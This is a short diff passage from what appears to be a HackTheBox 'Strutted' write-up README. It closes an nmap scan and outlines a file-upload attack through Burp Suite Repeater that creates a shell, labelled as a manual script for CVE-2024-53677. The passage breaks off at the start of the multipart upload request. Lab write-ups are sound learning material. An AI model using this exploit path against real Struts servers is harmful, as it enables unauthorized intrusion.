JammerDEV-Es/HackTheBox-ReviewAndWriteup/Strutted/README.md

 Nmap done: 1 IP address (1 host up) scanned in 9.54 seconds
 ```

 Well, after the scan, I will give a brief summary of what you will have to do.
 Basically, you need to upload a PNG or GIF image (preferably) and intercept traffic with Burp Suite on `127.0.0.1 8080`.
-Then, send it to repeater on BurpSuite and add a script that will create a shell;
+Then, send it to repeater on BurpSuite and add a script that will create a shell

+(CVE-2024-53677 Manual Script):
 ```bash
 ------WebKitFormBoundaryApuxGnsr1KZey6yQ
 Content-Disposition: form-data; name="Upload"; filename="naowa.gif"